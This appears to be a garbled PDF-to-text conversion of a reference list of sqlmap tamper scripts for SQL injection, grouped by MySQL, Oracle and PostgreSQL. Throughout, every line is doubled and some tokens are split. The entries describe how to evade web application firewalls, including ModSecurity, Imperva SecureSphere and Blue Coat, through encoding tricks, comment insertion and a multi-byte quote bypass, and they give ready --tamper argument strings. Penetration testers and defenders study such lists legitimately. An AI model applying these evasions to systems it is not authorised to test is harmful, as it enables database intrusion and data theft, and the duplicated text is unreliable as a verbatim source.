Notes:Notes:
* Useful to bypass several web application firewalls.* Useful to bypass several web application firewalls.
space2plusspace2plus
Replaces space character (‘ ‘) with plus (‘+’)Replaces space character (‘ ‘) with plus (‘+’)
Notes:Notes:
* Is this any useful? The plus get’s url-encoded by sqlmap engine* Is this any useful? The plus get’s url-encoded by sqlmap engine
invalidating the query afterwardsinvalidating the query afterwards
* This tamper script works against all databases* This tamper script works against all databases
space2randomblankspace2randomblank
Replaces space character (‘ ‘) with a random blank character from aReplaces space character (‘ ‘) with a random blank character from a
valid set of alternate charactersvalid set of alternate characters
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass several web application firewalls* Useful to bypass several web application firewalls
unionalltounionunionalltounion
Replaces UNION ALL SELECT with UNION SELECTReplaces UNION ALL SELECT with UNION SELECT
unmagicquotesunmagicquotes
Replaces quote character (‘) with a multi-byte combo %bf%27 together withReplaces quote character (‘) with a multi-byte combo %bf%27 together with
generic comment at the end (to make it work)generic comment at the end (to make it work)
Notes:Notes:
* Useful for bypassing magic_quotes/addslashes feature* Useful for bypassing magic_quotes/addslashes feature
Reference:Reference:
** http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
converted by Web2PDFConvert.com
xforwardedforxforwardedfor
Append a fake HTTP header ‘X-Forwarded-For’ to bypassAppend a fake HTTP header ‘X-Forwarded-For’ to bypass
WAF (usually application based) protectionWAF (usually application based) protection
MySQLMySQL--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekey--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentagwords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2rande,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedforomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
betweenbetween
Replaces greater than operator (‘>’) with ‘NOT BETWEEN 0 AND #’Replaces greater than operator (‘>’) with ‘NOT BETWEEN 0 AND #’
Replaces equals operator (‘=’) with ‘BETWEEN # AND #’Replaces equals operator (‘=’) with ‘BETWEEN # AND #’
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls that* Useful to bypass weak and bespoke web application firewalls that
filter the greater than characterfilter the greater than character
* The BETWEEN clause is SQL standard. Hence, this tamper script* The BETWEEN clause is SQL standard. Hence, this tamper script
should work against all (?) databasesshould work against all (?) databases
bluecoatbluecoat
Replaces space character after SQL statement with a valid random blank character.Replaces space character after SQL statement with a valid random blank character.
Afterwards replace character = with LIKE operatorAfterwards replace character = with LIKE operator
Requirement:Requirement:
* Blue Coat SGOS with WAF activated as documented in* Blue Coat SGOS with WAF activated as documented in
https://kb.bluecoat.com/index?page=content&id=FAQ2147https://kb.bluecoat.com/index?page=content&id=FAQ2147
Tested against:Tested against:
* MySQL 5.1, SGOS* MySQL 5.1, SGOS
Notes:Notes:
* Useful to bypass Blue Coat’s recommended WAF rule configuration* Useful to bypass Blue Coat’s recommended WAF rule configuration
charencodecharencode
Url-encodes all characters in a given payload (not processing alreadyUrl-encodes all characters in a given payload (not processing already
encoded)encoded)
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass very weak web application firewalls that do not* Useful to bypass very weak web application firewalls that do not
url-decode the request before processing it through their ruleseturl-decode the request before processing it through their ruleset
* The web server will anyway pass the url-decoded version behind,* The web server will anyway pass the url-decoded version behind,
converted by Web2PDFConvert.com
hence it should work against any DBMShence it should work against any DBMS
charunicodeencodecharunicodeencode
Unicode-url-encodes non-encoded characters in a given payload (notUnicode-url-encodes non-encoded characters in a given payload (not
processing already encoded)processing already encoded)
Requirement:Requirement:
* ASP* ASP
* ASP.NET* ASP.NET
Tested against:Tested against:
* Microsoft SQL Server 2000* Microsoft SQL Server 2000
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 5.1.56* MySQL 5.1.56
* PostgreSQL 9.0.3* PostgreSQL 9.0.3
Notes:Notes:
* Useful to bypass weak web application firewalls that do not* Useful to bypass weak web application firewalls that do not
unicode url-decode the request before processing it through theirunicode url-decode the request before processing it through their
rulesetruleset
concat2concatwsconcat2concatws
Replaces instances like ‘CONCAT(A, B)’ with ‘CONCAT_WS(MID(CHAR(0), 0, 0), A, B)’Replaces instances like ‘CONCAT(A, B)’ with ‘CONCAT_WS(MID(CHAR(0), 0, 0), A, B)’
Requirement:Requirement:
* MySQL* MySQL
Tested against:Tested against:
* MySQL 5.0* MySQL 5.0
Notes:Notes:
* Useful to bypass very weak and bespoke web application firewalls* Useful to bypass very weak and bespoke web application firewalls
that filter the CONCAT() functionthat filter the CONCAT() function
equaltolikeequaltolike
Replaces all occurances of operator equal (‘=’) with operator ‘LIKE’Replaces all occurances of operator equal (‘=’) with operator ‘LIKE’
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls that* Useful to bypass weak and bespoke web application firewalls that
filter the equal character (‘=’)filter the equal character (‘=’)
* The LIKE operator is SQL standard. Hence, this tamper script* The LIKE operator is SQL standard. Hence, this tamper script
should work against all (?) databasesshould work against all (?) databases
greatestgreatest
Replaces greater than operator (‘>’) with ‘GREATEST’ counterpartReplaces greater than operator (‘>’) with ‘GREATEST’ counterpart
Tested against:Tested against:
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls that* Useful to bypass weak and bespoke web application firewalls that
converted by Web2PDFConvert.com
filter the greater than characterfilter the greater than character
* The GREATEST clause is a widespread SQL command. Hence, this* The GREATEST clause is a widespread SQL command. Hence, this
tamper script should work against majority of databasestamper script should work against majority of databases
halfversionedmorekeywordshalfversionedmorekeywords
Adds versioned MySQL comment before each keywordAdds versioned MySQL comment before each keyword
Requirement:Requirement:
* MySQL < 5.1* MySQL < 5.1
Tested against:Tested against:
* MySQL 4.0.18, 5.0.22* MySQL 4.0.18, 5.0.22
Notes:Notes:
* Useful to bypass several web application firewalls when the* Useful to bypass several web application firewalls when the
back-end database management system is MySQLback-end database management system is MySQL
* Used during the ModSecurity SQL injection challenge,* Used during the ModSecurity SQL injection challenge,
http://modsecurity.org/demo/challenge.htmlhttp://modsecurity.org/demo/challenge.html
ifnull2ifisnullifnull2ifisnull
Replaces instances like ‘IFNULL(A, B)’ with ‘IF(ISNULL(A), B, A)’Replaces instances like ‘IFNULL(A, B)’ with ‘IF(ISNULL(A), B, A)’
Requirement:Requirement:
* MySQL* MySQL
* SQLite (possibly)* SQLite (possibly)
* SAP MaxDB (possibly)* SAP MaxDB (possibly)
Tested against:Tested against:
* MySQL 5.0 and 5.5* MySQL 5.0 and 5.5
Notes:Notes:
* Useful to bypass very weak and bespoke web application firewalls* Useful to bypass very weak and bespoke web application firewalls
that filter the IFNULL() functionthat filter the IFNULL() function
modsecurityversionedmodsecurityversioned
Embraces complete query with versioned commentEmbraces complete query with versioned comment
Requirement:Requirement:
* MySQL* MySQL
Tested against:Tested against:
* MySQL 5.0* MySQL 5.0
Notes:Notes:
* Useful to bypass ModSecurity WAF/IDS* Useful to bypass ModSecurity WAF/IDS
modsecurityzeroversionedmodsecurityzeroversioned
Embraces complete query with zero-versioned commentEmbraces complete query with zero-versioned comment
Requirement:Requirement:
* MySQL* MySQL
Tested against:Tested against:
* MySQL 5.0* MySQL 5.0
Notes:Notes:
* Useful to bypass ModSecurity WAF/IDS* Useful to bypass ModSecurity WAF/IDS
multiplespacesmultiplespaces
converted by Web2PDFConvert.com
Adds multiple spaces around SQL keywordsAdds multiple spaces around SQL keywords
Notes:Notes:
* Useful to bypass very weak and bespoke web application firewalls* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressionsthat has poorly written permissive regular expressions
Reference: Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppthttps://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt
nonrecursivereplacementnonrecursivereplacement
Replaces predefined SQL keywords with representationsReplaces predefined SQL keywords with representations
suitable for replacement (e.g. .replace(“SELECT”, “”)) filterssuitable for replacement (e.g. .replace(“SELECT”, “”)) filters
Notes:Notes:
* Useful to bypass very weak custom filters* Useful to bypass very weak custom filters
percentagepercentage
Adds a percentage sign (‘%’) infront of each characterAdds a percentage sign (‘%’) infront of each character
Requirement:Requirement:
* ASP* ASP
Tested against:Tested against:
* Microsoft SQL Server 2000, 2005* Microsoft SQL Server 2000, 2005
* MySQL 5.1.56, 5.5.11* MySQL 5.1.56, 5.5.11
* PostgreSQL 9.0* PostgreSQL 9.0
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls* Useful to bypass weak and bespoke web application firewalls
randomcaserandomcase
Replaces each keyword character with random case valueReplaces each keyword character with random case value
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass very weak and bespoke web application firewalls* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressionsthat has poorly written permissive regular expressions
* This tamper script should work against all (?) databases* This tamper script should work against all (?) databases
securespheresecuresphere
Appends special crafted stringAppends special crafted string
Notes:Notes:
* Useful for bypassing Imperva SecureSphere WAF* Useful for bypassing Imperva SecureSphere WAF
* Reference: http://seclists.org/fulldisclosure/2011/May/163* Reference: http://seclists.org/fulldisclosure/2011/May/163
space2commentspace2comment
Replaces space character (‘ ‘) with comments ‘/**/’Replaces space character (‘ ‘) with comments ‘/**/’
converted by Web2PDFConvert.com
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls* Useful to bypass weak and bespoke web application firewalls
space2hashspace2hash
Replaces space character (‘ ‘) with a pound character (‘#’) followed byReplaces space character (‘ ‘) with a pound character (‘#’) followed by
a random string and a new line (‘\n’)a random string and a new line (‘\n’)
Requirement:Requirement:
* MySQL* MySQL
Tested against:Tested against:
* MySQL 4.0, 5.0* MySQL 4.0, 5.0
Notes:Notes:
* Useful to bypass several web application firewalls* Useful to bypass several web application firewalls
* Used during the ModSecurity SQL injection challenge,* Used during the ModSecurity SQL injection challenge,
http://modsecurity.org/demo/challenge.htmlhttp://modsecurity.org/demo/challenge.html
space2morehashspace2morehash
Replaces space character (‘ ‘) with a pound character (‘#’) followed byReplaces space character (‘ ‘) with a pound character (‘#’) followed by
a random string and a new line (‘\n’)a random string and a new line (‘\n’)
Requirement:Requirement:
* MySQL >= 5.1.13* MySQL >= 5.1.13
Tested against:Tested against:
* MySQL 5.1.41* MySQL 5.1.41
Notes:Notes:
* Useful to bypass several web application firewalls* Useful to bypass several web application firewalls
* Used during the ModSecurity SQL injection challenge,* Used during the ModSecurity SQL injection challenge,
http://modsecurity.org/demo/challenge.htmlhttp://modsecurity.org/demo/challenge.html
space2mysqldashspace2mysqldash
Replaces space character (‘ ‘) with a dash comment (‘–’) followed byReplaces space character (‘ ‘) with a dash comment (‘–’) followed by
a new line (‘\n’)a new line (‘\n’)
Requirement:Requirement:
* MySQL* MySQL
* MSSQL* MSSQL
Tested against:Tested against:
Notes:Notes:
* Useful to bypass several web application firewalls.* Useful to bypass several web application firewalls.
space2plusspace2plus
Replaces space character (‘ ‘) with plus (‘+’)Replaces space character (‘ ‘) with plus (‘+’)
Notes:Notes:
converted by Web2PDFConvert.com
* Is this any useful? The plus get’s url-encoded by sqlmap engine* Is this any useful? The plus get’s url-encoded by sqlmap engine
invalidating the query afterwardsinvalidating the query afterwards
* This tamper script works against all databases* This tamper script works against all databases
space2randomblankspace2randomblank
Replaces space character (‘ ‘) with a random blank character from aReplaces space character (‘ ‘) with a random blank character from a
valid set of alternate charactersvalid set of alternate characters
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass several web application firewalls* Useful to bypass several web application firewalls
unionalltounionunionalltounion
Replaces UNION ALL SELECT with UNION SELECTReplaces UNION ALL SELECT with UNION SELECT
unmagicquotesunmagicquotes
Replaces quote character (‘) with a multi-byte combo %bf%27 together withReplaces quote character (‘) with a multi-byte combo %bf%27 together with
generic comment at the end (to make it work)generic comment at the end (to make it work)
Notes:Notes:
* Useful for bypassing magic_quotes/addslashes feature* Useful for bypassing magic_quotes/addslashes feature
Reference:Reference:
** http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
versionedkeywordsversionedkeywords
Encloses each non-function keyword with versioned MySQL commentEncloses each non-function keyword with versioned MySQL comment
Requirement:Requirement:
* MySQL* MySQL
Tested against:Tested against:
* MySQL 4.0.18, 5.1.56, 5.5.11* MySQL 4.0.18, 5.1.56, 5.5.11
Notes:Notes:
* Useful to bypass several web application firewalls when the* Useful to bypass several web application firewalls when the
back-end database management system is MySQLback-end database management system is MySQL
versionedmorekeywordsversionedmorekeywords
Encloses each keyword with versioned MySQL commentEncloses each keyword with versioned MySQL comment
Requirement:Requirement:
* MySQL >= 5.1.13* MySQL >= 5.1.13
Tested against:Tested against:
* MySQL 5.1.56, 5.5.11* MySQL 5.1.56, 5.5.11
Notes:Notes:
* Useful to bypass several web application firewalls when the* Useful to bypass several web application firewalls when the
converted by Web2PDFConvert.com
back-end database management system is MySQLback-end database management system is MySQL
xforwardedforxforwardedfor
Append a fake HTTP header ‘X-Forwarded-For’ to bypassAppend a fake HTTP header ‘X-Forwarded-For’ to bypass
WAF (usually application based) protectionWAF (usually application based) protection
OracleOracle--tamper=between,charencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,randomcase,securesphere,--tamper=between,charencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes,xforwardedforspace2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes,xforwardedfor
betweenbetween
Replaces greater than operator (‘>’) with ‘NOT BETWEEN 0 AND #’Replaces greater than operator (‘>’) with ‘NOT BETWEEN 0 AND #’
Replaces equals operator (‘=’) with ‘BETWEEN # AND #’Replaces equals operator (‘=’) with ‘BETWEEN # AND #’
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls that* Useful to bypass weak and bespoke web application firewalls that
filter the greater than characterfilter the greater than character
* The BETWEEN clause is SQL standard. Hence, this tamper script* The BETWEEN clause is SQL standard. Hence, this tamper script
should work against all (?) databasesshould work against all (?) databases
charencodecharencode
Url-encodes all characters in a given payload (not processing alreadyUrl-encodes all characters in a given payload (not processing already
encoded)encoded)
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass very weak web application firewalls that do not* Useful to bypass very weak web application firewalls that do not
url-decode the request before processing it through their ruleseturl-decode the request before processing it through their ruleset
* The web server will anyway pass the url-decoded version behind,* The web server will anyway pass the url-decoded version behind,
hence it should work against any DBMShence it should work against any DBMS
equaltolikeequaltolike
Replaces all occurances of operator equal (‘=’) with operator ‘LIKE’Replaces all occurances of operator equal (‘=’) with operator ‘LIKE’
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls that* Useful to bypass weak and bespoke web application firewalls that
filter the equal character (‘=’)filter the equal character (‘=’)
* The LIKE operator is SQL standard. Hence, this tamper script* The LIKE operator is SQL standard. Hence, this tamper script
should work against all (?) databasesshould work against all (?) databases
converted by Web2PDFConvert.com
greatestgreatest
Replaces greater than operator (‘>’) with ‘GREATEST’ counterpartReplaces greater than operator (‘>’) with ‘GREATEST’ counterpart
Tested against:Tested against:
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls that* Useful to bypass weak and bespoke web application firewalls that
filter the greater than characterfilter the greater than character
* The GREATEST clause is a widespread SQL command. Hence, this* The GREATEST clause is a widespread SQL command. Hence, this
tamper script should work against majority of databasestamper script should work against majority of databases
multiplespacesmultiplespaces
Adds multiple spaces around SQL keywordsAdds multiple spaces around SQL keywords
Notes:Notes:
* Useful to bypass very weak and bespoke web application firewalls* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressionsthat has poorly written permissive regular expressions
Reference: Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppthttps://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt
nonrecursivereplacementnonrecursivereplacement
Replaces predefined SQL keywords with representationsReplaces predefined SQL keywords with representations
suitable for replacement (e.g. .replace(“SELECT”, “”)) filterssuitable for replacement (e.g. .replace(“SELECT”, “”)) filters
Notes:Notes:
* Useful to bypass very weak custom filters* Useful to bypass very weak custom filters
randomcaserandomcase
Replaces each keyword character with random case valueReplaces each keyword character with random case value
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass very weak and bespoke web application firewalls* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressionsthat has poorly written permissive regular expressions
* This tamper script should work against all (?) databases* This tamper script should work against all (?) databases
securespheresecuresphere
Appends special crafted stringAppends special crafted string
Notes:Notes:
* Useful for bypassing Imperva SecureSphere WAF* Useful for bypassing Imperva SecureSphere WAF
* Reference: http://seclists.org/fulldisclosure/2011/May/163* Reference: http://seclists.org/fulldisclosure/2011/May/163
converted by Web2PDFConvert.com
space2commentspace2comment
Replaces space character (‘ ‘) with comments ‘/**/’Replaces space character (‘ ‘) with comments ‘/**/’
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls* Useful to bypass weak and bespoke web application firewalls
space2plusspace2plus
Replaces space character (‘ ‘) with plus (‘+’)Replaces space character (‘ ‘) with plus (‘+’)
Notes:Notes:
* Is this any useful? The plus get’s url-encoded by sqlmap engine* Is this any useful? The plus get’s url-encoded by sqlmap engine
invalidating the query afterwardsinvalidating the query afterwards
* This tamper script works against all databases* This tamper script works against all databases
space2randomblankspace2randomblank
Replaces space character (‘ ‘) with a random blank character from aReplaces space character (‘ ‘) with a random blank character from a
valid set of alternate charactersvalid set of alternate characters
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass several web application firewalls* Useful to bypass several web application firewalls
unionalltounionunionalltounion
Replaces UNION ALL SELECT with UNION SELECTReplaces UNION ALL SELECT with UNION SELECT
unmagicquotesunmagicquotes
Replaces quote character (‘) with a multi-byte combo %bf%27 together withReplaces quote character (‘) with a multi-byte combo %bf%27 together with
generic comment at the end (to make it work)generic comment at the end (to make it work)
Notes:Notes:
* Useful for bypassing magic_quotes/addslashes feature* Useful for bypassing magic_quotes/addslashes feature
Reference:Reference:
** http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
xforwardedforxforwardedfor
converted by Web2PDFConvert.com
Append a fake HTTP header ‘X-Forwarded-For’ to bypassAppend a fake HTTP header ‘X-Forwarded-For’ to bypass
WAF (usually application based) protectionWAF (usually application based) protection
PostgreSQLPostgreSQL--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percent--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,xforwardedforage,randomcase,securesphere,space2comment,space2plus,space2randomblank,xforwardedfor
betweenbetween
Replaces greater than operator (‘>’) with ‘NOT BETWEEN 0 AND #’Replaces greater than operator (‘>’) with ‘NOT BETWEEN 0 AND #’
Replaces equals operator (‘=’) with ‘BETWEEN # AND #’Replaces equals operator (‘=’) with ‘BETWEEN # AND #’
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls that* Useful to bypass weak and bespoke web application firewalls that
filter the greater than characterfilter the greater than character
* The BETWEEN clause is SQL standard. Hence, this tamper script* The BETWEEN clause is SQL standard. Hence, this tamper script
should work against all (?) databasesshould work against all (?) databases
charencodecharencode
Url-encodes all characters in a given payload (not processing alreadyUrl-encodes all characters in a given payload (not processing already
encoded)encoded)
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass very weak web application firewalls that do not* Useful to bypass very weak web application firewalls that do not
url-decode the request before processing it through their ruleseturl-decode the request before processing it through their ruleset
* The web server will anyway pass the url-decoded version behind,* The web server will anyway pass the url-decoded version behind,
hence it should work against any DBMShence it should work against any DBMS
charunicodeencodecharunicodeencode
Unicode-url-encodes non-encoded characters in a given payload (notUnicode-url-encodes non-encoded characters in a given payload (not
processing already encoded)processing already encoded)
Requirement:Requirement:
* ASP* ASP
* ASP.NET* ASP.NET
Tested against:Tested against:
* Microsoft SQL Server 2000* Microsoft SQL Server 2000
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 5.1.56* MySQL 5.1.56
* PostgreSQL 9.0.3* PostgreSQL 9.0.3
Notes:Notes:
* Useful to bypass weak web application firewalls that do not* Useful to bypass weak web application firewalls that do not
converted by Web2PDFConvert.com
unicode url-decode the request before processing it through theirunicode url-decode the request before processing it through their
rulesetruleset
equaltolikeequaltolike
Replaces all occurances of operator equal (‘=’) with operator ‘LIKE’Replaces all occurances of operator equal (‘=’) with operator ‘LIKE’
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls that* Useful to bypass weak and bespoke web application firewalls that
filter the equal character (‘=’)filter the equal character (‘=’)
* The LIKE operator is SQL standard. Hence, this tamper script* The LIKE operator is SQL standard. Hence, this tamper script
should work against all (?) databasesshould work against all (?) databases
greatestgreatest
Replaces greater than operator (‘>’) with ‘GREATEST’ counterpartReplaces greater than operator (‘>’) with ‘GREATEST’ counterpart
Tested against:Tested against:
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls that* Useful to bypass weak and bespoke web application firewalls that
filter the greater than characterfilter the greater than character
* The GREATEST clause is a widespread SQL command. Hence, this* The GREATEST clause is a widespread SQL command. Hence, this
tamper script should work against majority of databasestamper script should work against majority of databases
multiplespacesmultiplespaces
Adds multiple spaces around SQL keywordsAdds multiple spaces around SQL keywords
Notes:Notes:
* Useful to bypass very weak and bespoke web application firewalls* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressionsthat has poorly written permissive regular expressions
Reference: Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppthttps://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt
nonrecursivereplacementnonrecursivereplacement
Replaces predefined SQL keywords with representationsReplaces predefined SQL keywords with representations
suitable for replacement (e.g. .replace(“SELECT”, “”)) filterssuitable for replacement (e.g. .replace(“SELECT”, “”)) filters
Notes:Notes:
* Useful to bypass very weak custom filters* Useful to bypass very weak custom filters
percentagepercentage
Adds a percentage sign (‘%’) infront of each characterAdds a percentage sign (‘%’) infront of each character
Requirement:Requirement:
* ASP* ASP
Tested against:Tested against:
* Microsoft SQL Server 2000, 2005* Microsoft SQL Server 2000, 2005
converted by Web2PDFConvert.com
* MySQL 5.1.56, 5.5.11* MySQL 5.1.56, 5.5.11
* PostgreSQL 9.0* PostgreSQL 9.0
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls* Useful to bypass weak and bespoke web application firewalls
randomcaserandomcase
Replaces each keyword character with random case valueReplaces each keyword character with random case value
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass very weak and bespoke web application firewalls* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressionsthat has poorly written permissive regular expressions
* This tamper script should work against all (?) databases* This tamper script should work against all (?) databases
securespheresecuresphere
Appends special crafted stringAppends special crafted string
Notes:Notes:
* Useful for bypassing Imperva SecureSphere WAF* Useful for bypassing Imperva SecureSphere WAF
* Reference: http://seclists.org/fulldisclosure/2011/May/163* Reference: http://seclists.org/fulldisclosure/2011/May/163
space2commentspace2comment
Replaces space character (‘ ‘) with comments ‘/**/’Replaces space character (‘ ‘) with comments ‘/**/’
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls* Useful to bypass weak and bespoke web application firewalls
space2plusspace2plus
Replaces space character (‘ ‘) with plus (‘+’)Replaces space character (‘ ‘) with plus (‘+’)
Notes:Notes:
* Is this any useful? The plus get’s url-encoded by sqlmap engine* Is this any useful? The plus get’s url-encoded by sqlmap engine
invalidating the query afterwardsinvalidating the query afterwards
* This tamper script works against all databases* This tamper script works against all databases
space2randomblankspace2randomblank
Replaces space character (‘ ‘) with a random blank character from aReplaces space character (‘ ‘) with a random blank character from a
valid set of alternate charactersvalid set of alternate characters
converted by Web2PDFConvert.com
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass several web application firewalls* Useful to bypass several web application firewalls
xforwardedforxforwardedfor
Append a fake HTTP header ‘Append a fake HTTP header ‘XX-Forwarded-For’ to bypass-Forwarded-For’ to bypass
